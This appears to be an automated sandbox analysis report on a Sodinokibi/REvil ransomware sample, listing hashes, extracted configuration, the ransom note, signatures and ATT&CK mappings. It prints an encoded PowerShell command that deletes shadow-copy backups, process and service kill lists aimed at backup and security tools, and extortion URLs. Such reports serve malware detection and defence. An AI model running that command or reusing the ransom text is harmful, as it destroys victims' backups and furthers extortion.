Analysis

  • max time kernel
    131s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64 arch:x86 image:win7-20230712-en locale:en-us os:windows7-x64 system
  • submitted
    05-08-2023 08:38

General

  • Target

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

  • Size

    221KB

  • MD5

    77ed1092409c927f5cd1992021f99147

  • SHA1

    4c9027e660614db7fe653e67a7ac0b726b52cc44

  • SHA256

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463

  • SHA512

    1e01f85f50179fb7620680809862c28c8955e696b397acd6766a2d8a18b81cc08f99c2a059213797ea8de1e004412b9d4853cf1c2ae9f451505322b00e26238a

  • SSDEEP

    6144:Za/6o9aptGtbbqcqjuEyileXEHpSYxyEpq:S5atGtfqcqju3iXHpSgq

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

Campaign

4402

Decoy


Attributes
  • net

    true

  • pid

    $2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

  • prc

    isqlplussvc

    mydesktopqos

    onenote

    ocomm

    dbsnmp

    powerpnt

    winword

    thebat

    sql

    infopath

    visio

    firefox

    tbirdconfig

    wordpad

    agntsvc

    msaccess

    sqbcoreservice

    xfssvccon

    dbeng50

    thunderbird

    outlook

    mspub

    excel

    mydesktopservice

    steam

    ocautoupds

    oracle

    encsvc

    synctime

    ocssd

  • ransom_oneliner

    Soon you may lose your files FOREVER Find: "readme-{EXT}-NOW.txt" in folders or on your desktop! YOU HAVE A FEW DAYS OR A FILE WILL BE LOST FOREVER !!!

  • ransom_template

    Your files are locked due to a vulnerability in your system by "{EXT}" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/{UID} If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} After going to the site, enter the following code: {KEY}

  • sub

    4402

  • svc

    vss

    backup

    svc$

    memtas

    sql

    veeam

    mepocs

    sophos

Extracted

Path

C:\Users\readme-cr0v4-NOW.txt

Ransom Note
Your files are locked due to a vulnerability in your system by "cr0v4" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/B455AE79B35BE10E If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! 
After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B455AE79B35BE10E After going to the site, enter the following code:
URLs

http://decryptor.cc/B455AE79B35BE10E

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B455AE79B35BE10E

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
    "C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2332
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1952
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2888
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2436

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    • Persistence
      • Boot or Logon Autostart Execution (T1547): 1
      • Registry Run Keys / Startup Folder (T1547.001): 1

    • Privilege Escalation
      • Boot or Logon Autostart Execution (T1547): 1
      • Registry Run Keys / Startup Folder (T1547.001): 1

    • Defense Evasion
      • Modify Registry (T1112): 3
      • Subvert Trust Controls (T1553): 1
      • Install Root Certificate (T1553.004): 1

    • Discovery
      • Query Registry (T1012): 1
      • Peripheral Device Discovery (T1120): 1
      • System Information Discovery (T1082): 1

    • Impact
      • Defacement (T1491): 1


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab4684.tmp
      Filesize

      62KB

      MD5

      3ac860860707baaf32469fa7cc7c0192

      SHA1

      c33c2acdaba0e6fa41fd2f00f186804722477639

      SHA256

      d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

      SHA512

      d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

    • C:\Users\Admin\AppData\Local\Temp\Tar48D8.tmp
      Filesize

      164KB

      MD5

      4ff65ad929cd9a367680e0e5b1c08166

      SHA1

      c0af0d4396bd1f15c45f39d3b849ba444233b3a2

      SHA256

      c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

      SHA512

      f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

    • C:\Users\readme-cr0v4-NOW.txt
      Filesize

      5KB

      MD5

      78828999c43b717fe00afd1fa00833ba

      SHA1

      b385d9f09b73e2d390ed8de004a39d8f4be64e28

      SHA256

      1e4025b1ef5c97649c18112a16d8c5a5dcfc9a5da6d97d1cf25114ed05e601e5

      SHA512

      ce9146e0af633bed5154c6158268627d508b13d056e549ce7fe03a2980fa14e7f7d96ff7bdd8bcb2bcff87f0b7533e783dcb4b7ca3baaf32de97815767f5d76c

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      194KB

      MD5

      bc6362a1913e12e51168d98208922f59

      SHA1

      b69d30da0f081e7e320c49d127f5308a20828863

      SHA256

      f4af4fe75782f895049ff9ab95657481be015503918eb46633bd174869d4180b

      SHA512

      d42883eb6cfa77ce9efd18f6a95bd4d0cf59d33669c34bb420325adec24ee3c9ba9b09f22561049b2f583d41495f5382617f11b509f6e1babb29e216470fe068
